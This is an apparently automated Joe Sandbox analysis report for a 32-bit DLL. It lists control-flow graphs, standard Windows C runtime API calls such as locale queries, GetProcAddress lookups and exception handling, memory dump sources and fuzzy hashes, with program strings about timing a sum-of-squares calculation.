                                                                                                      control_flow_graph 282 6d407d40-6d407d51 call 6d4087f0 285 6d407d62-6d407d69 282->285 286 6d407d53-6d407d59 282->286 288 6d407d75-6d407d89 dllmain_raw 285->288 289 6d407d6b-6d407d6e 285->289 286->285 287 6d407d5b-6d407d5d 286->287 290 6d407e3b-6d407e4a 287->290 292 6d407e32-6d407e39 288->292 293 6d407d8f-6d407da0 dllmain_crt_dispatch 288->293 289->288 291 6d407d70-6d407d73 289->291 294 6d407da6-6d407dab call 6d4024c0 291->294 292->290 293->292 293->294 296 6d407db0-6d407db8 294->296 297 6d407de1-6d407de3 296->297 298 6d407dba-6d407dbc 296->298 299 6d407de5-6d407de8 297->299 300 6d407dea-6d407dfb dllmain_crt_dispatch 297->300 298->297 301 6d407dbe-6d407ddc call 6d4024c0 call 6d407c90 dllmain_raw 298->301 299->292 299->300 300->292 302 6d407dfd-6d407e2f dllmain_raw 300->302 301->297 302->292
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                      • String ID:
                                                                                                      • API String ID: 3136044242-0
                                                                                                      • Opcode ID: 5172eeed918cbbf877e92d340df6364af4a32711fa6b819c8348e15d271e515e
                                                                                                      • Instruction ID: b2fd478f9ced125a37cfd93eb41001cf200d37d7c05b463e930ecf5371f029be
                                                                                                      • Opcode Fuzzy Hash: 5172eeed918cbbf877e92d340df6364af4a32711fa6b819c8348e15d271e515e
                                                                                                      • Instruction Fuzzy Hash: 9F216071D0D65AABCB219F55C880E7F3A79EF81794B114139EA1467310D7318D428BE1

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 6D4011C0: __alldvrm.LIBCMT ref: 6D401213
                                                                                                        • Part of subcall function 6D4011C0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D401234
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D402594
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm
                                                                                                      • String ID: seconds.$Calculated sum of squares for 5 seconds: $Time taken:
                                                                                                      • API String ID: 67483490-725188347
                                                                                                      • Opcode ID: 81532171a62f03919a48a539055870cd8231e2399d6cc2675860731e6c876493
                                                                                                      • Instruction ID: 9c02abf738fab573f7a316008a09a8e4cab72b2a09cf71ffad835ca31f7c18dc
                                                                                                      • Opcode Fuzzy Hash: 81532171a62f03919a48a539055870cd8231e2399d6cc2675860731e6c876493
                                                                                                      • Instruction Fuzzy Hash: 2F21C2712182014BC214EF78C8D0E2FB3A9AFD9248F11892DF5459B290EF30ED4986E7

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • __RTC_Initialize.LIBCMT ref: 6D407BD6
                                                                                                        • Part of subcall function 6D40862A: InitializeSListHead.KERNEL32(6D430558,6D407BE0,6D42DFC8,00000010,6D407B71,?,?,?,6D407D99,?,00000001,?,?,00000001,?,6D42E010), ref: 6D40862F
                                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D407C40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                      • String ID: Eh@m
                                                                                                      • API String ID: 3231365870-137412459
                                                                                                      • Opcode ID: c7717139f8fe7bef513d1f7ce81df5565a930bef672f032e3c90ba3a770393f4
                                                                                                      • Instruction ID: 2f3b98618f7cbe3d596e975a969f7c9f3f009a851b037aaa8052c881463991d5
                                                                                                      • Opcode Fuzzy Hash: c7717139f8fe7bef513d1f7ce81df5565a930bef672f032e3c90ba3a770393f4
                                                                                                      • Instruction Fuzzy Hash: F021C37294D646AADB00FBB4D501FBC33619F0A36DF22443DD690672C2CB364D41CA96

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 388 6d413f12-6d413f17 389 6d413f19-6d413f31 388->389 390 6d413f33-6d413f37 389->390 391 6d413f3f-6d413f48 389->391 390->391 392 6d413f39-6d413f3d 390->392 393 6d413f5a 391->393 394 6d413f4a-6d413f4d 391->394 395 6d413fb8-6d413fbc 392->395 398 6d413f5c-6d413f69 GetStdHandle 393->398 396 6d413f56-6d413f58 394->396 397 6d413f4f-6d413f54 394->397 395->389 399 6d413fc2-6d413fc5 395->399 396->398 397->398 400 6d413f78 398->400 401 6d413f6b-6d413f6d 398->401 402 6d413f7a-6d413f7c 400->402 401->400 403 6d413f6f-6d413f76 GetFileType 401->403 404 6d413f9a-6d413fac 402->404 405 6d413f7e-6d413f87 402->405 403->402 404->395 408 6d413fae-6d413fb1 404->408 406 6d413f89-6d413f8d 405->406 407 6d413f8f-6d413f92 405->407 406->395 407->395 409 6d413f94-6d413f98 407->409 408->395 409->395
                                                                                                      APIs
                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 6D413F5E
                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 6D413F70
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: b7c0da1f32e3b56efab2ab6ca1dc701e307937a5fa435d6af0f1011a6905d095
                                                                                                      • Instruction ID: 099ae50f12eeea59035ac35652e1dbcdd162255314081b271708b9f2282528fb
                                                                                                      • Opcode Fuzzy Hash: b7c0da1f32e3b56efab2ab6ca1dc701e307937a5fa435d6af0f1011a6905d095
                                                                                                      • Instruction Fuzzy Hash: 07117F7151C7835ADB214A3E8C9CB32BEB4AB97234B34075AE1B6866E1C730DD8A8645

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 6D41A67E: GetEnvironmentStringsW.KERNEL32 ref: 6D41A687
                                                                                                        • Part of subcall function 6D41A67E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D41A6AA
                                                                                                        • Part of subcall function 6D41A67E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6D41A6D0
                                                                                                        • Part of subcall function 6D41A67E: _free.LIBCMT ref: 6D41A6E3
                                                                                                        • Part of subcall function 6D41A67E: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D41A6F2
                                                                                                      • _free.LIBCMT ref: 6D410746
                                                                                                      • _free.LIBCMT ref: 6D41074D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 400815659-0
                                                                                                      • Opcode ID: 0a18b157f831eefed5b96b0a3502a0fd757df742f97486bd48abb1792690b189
                                                                                                      • Instruction ID: 22441a35d02b4be848ff4cc76f87d6710ed7cbbf37e91bde9f46985df9417afd
                                                                                                      • Opcode Fuzzy Hash: 0a18b157f831eefed5b96b0a3502a0fd757df742f97486bd48abb1792690b189
                                                                                                      • Instruction Fuzzy Hash: 95E0ED7694E51106AAA2AA2F6C41F7A16941F82378F13032ADAB4CA1C1DF608C1689D2

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 478 6d4073ef-6d4076a8 GetModuleHandleW GetProcAddress * 40
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6D4073F5
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D407403
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D407414
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D407425
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D407436
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6D407447
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 6D407458
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6D407469
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 6D40747A
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6D40748B
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6D40749C
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6D4074AD
                                                                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6D4074BE
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6D4074CF
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6D4074E0
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6D4074F1
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6D407502
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 6D407513
                                                                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 6D407524
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 6D407535
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 6D407546
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 6D407557
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 6D407568
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 6D407579
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 6D40758A
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6D40759B
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 6D4075AC
                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 6D4075BD
                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 6D4075CE
                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 6D4075DF
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 6D4075F0
                                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 6D407601
                                                                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 6D407612
                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 6D407623
                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 6D407634
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 6D407645
                                                                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 6D407656
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 6D407667
                                                                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 6D407678
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6D407689
                                                                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 6D40769A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                      • API String ID: 667068680-295688737
                                                                                                      • Opcode ID: 5f82f99e1c81b80b4cde5dd9f7d2654053486e02f48f712b2720f6606a169a7b
                                                                                                      • Instruction ID: 33d32b21966609a40af70721ab185a52347679d3784cc3550b56a20c4a5a0fd5
                                                                                                      • Opcode Fuzzy Hash: 5f82f99e1c81b80b4cde5dd9f7d2654053486e02f48f712b2720f6606a169a7b
                                                                                                      • Instruction Fuzzy Hash: CD61FB75C77290ABCF207FBA9A4DF677AB8BB0B281706451AB215D2505DB76CC00CF64
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                        • Part of subcall function 6D411F56: _free.LIBCMT ref: 6D411FB1
                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6D41DFBE
                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 6D41E019
                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 6D41E028
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,|3Am,00000040,?,00000000,00000055,00000000,?,?,00000055,00000000), ref: 6D41E070
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6D41E08F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_free
                                                                                                      • String ID: DUBmE$|3Am$|3Am$|3Am
                                                                                                      • API String ID: 1213562535-849517993
                                                                                                      • Opcode ID: cbdc99c131164c46a593b483919b004912dedc154de9e7be36964cdbfa49ca4b
                                                                                                      • Instruction ID: 5a6714ffa74b4a4c51bee2e09a64e115540f171b31dcb0838687b40c91de0cc2
                                                                                                      • Opcode Fuzzy Hash: cbdc99c131164c46a593b483919b004912dedc154de9e7be36964cdbfa49ca4b
                                                                                                      • Instruction Fuzzy Hash: 375150B1908616ABEF00DFA5CC40FBA77B8BF85700F154469E925E7280E770DE048BA1
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,6D413383,?,?,?,?,?,?,00000004), ref: 6D41D642
                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D413383,?,?,?,?,?,?,00000004), ref: 6D41D654
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 6D41D6E4
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 6D41D6F2
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6D413383,00000000,6D4134A3), ref: 6D41D795
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                      • String ID: DUBmE
                                                                                                      • API String ID: 4147378913-846794591
                                                                                                      • Opcode ID: c42781129d77499e6f22e455762580aacbd67f870e2cb7c5dd0fd2899c36f8ad
                                                                                                      • Instruction ID: 1aaad9fa96d89cc31803dd95c8a789d85962361d5790acf05da5eb0388c5b0f1
                                                                                                      • Opcode Fuzzy Hash: c42781129d77499e6f22e455762580aacbd67f870e2cb7c5dd0fd2899c36f8ad
                                                                                                      • Instruction Fuzzy Hash: 52710AB160C606AAEB14EF34CC41FB673A8FF85354F21452DEA29D7680E770ED4187A0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __floor_pentium4
                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                      • Opcode ID: 3f2b34af4830b828fc7f1605e063af61d1785e03cea7c58271865b1384ececc0
                                                                                                      • Instruction ID: 26507d61cbb9b550c476b4b239bf9667cc08270c546df6c2d4328dfce6fcccf4
                                                                                                      • Opcode Fuzzy Hash: 3f2b34af4830b828fc7f1605e063af61d1785e03cea7c58271865b1384ececc0
                                                                                                      • Instruction Fuzzy Hash: B5C25A71E086298BDB25CE28CD40BEAB7B5FB4A344F1041EAD85DE7340E775AE858F41
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6D41DFFD,?,00000000), ref: 6D41DD70
                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6D41DFFD,?,00000000), ref: 6D41DD99
                                                                                                      • GetACP.KERNEL32(?,?,6D41DFFD,?,00000000), ref: 6D41DDAE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2299586839-711371036
                                                                                                      • Opcode ID: 58e3321eacf6527b6402929526fadd5b04896eb146a4c0e31dfc796876208db2
                                                                                                      • Instruction ID: 1b671b3094be13bc62701c7ca006646106533eb87f76eb8b7979c6434c820e6f
                                                                                                      • Opcode Fuzzy Hash: 58e3321eacf6527b6402929526fadd5b04896eb146a4c0e31dfc796876208db2
                                                                                                      • Instruction Fuzzy Hash: 4721BDB264C186AAE7259F58CD00FB773B6EFC6B64B628064E809D7204E732DE01C390
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6D408677
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 6D408743
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D408763
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 6D40876D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 254469556-0
                                                                                                      • Opcode ID: 16aadde57ab52003ba54e889273c4956e4ac5552dbbaa31e81819344cc0d3ac0
                                                                                                      • Instruction ID: 64986e8b6d7994015466bf4ac5b83ccc3f29c87da5ceb33d9b670cc696a7f795
                                                                                                      • Opcode Fuzzy Hash: 16aadde57ab52003ba54e889273c4956e4ac5552dbbaa31e81819344cc0d3ac0
                                                                                                      • Instruction Fuzzy Hash: 24312775D4521CDBDF10EFA4D989BCDBBB8AF08304F1441AAE50DAB240EB719A84DF45
                                                                                                      APIs
                                                                                                        • Part of subcall function 6D411F56: GetLastError.KERNEL32(00000000,00000000,6D40C19D,00000000,00000000,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411F5A
                                                                                                        • Part of subcall function 6D411F56: SetLastError.KERNEL32(00000000,00000004,000000FF,?,6D4153C8,00000000,00000000,?,0161F638,00000000), ref: 6D411FFE
                                                                                                        • Part of subcall function 6D411F56: _free.LIBCMT ref: 6D411FB1
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D41D9B2
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D41DA03
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6D41DAC3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1690466582-0
                                                                                                      • Opcode ID: d9614e944942e4678328a5806ff3a5f7aa76dc596e9074d05de3a5ea08f1a503
                                                                                                      • Instruction ID: 24a1e55fa0441d2e57a456d55ef7eea158316ae3a454f7318a8cc2c123a64d0a
                                                                                                      • Opcode Fuzzy Hash: d9614e944942e4678328a5806ff3a5f7aa76dc596e9074d05de3a5ea08f1a503
                                                                                                      • Instruction Fuzzy Hash: 9961BCB155C2079BEB18CF28CC82FBA77B8EF84354F2081A9E916C6289E775DD45CB50
                                                                                                      APIs
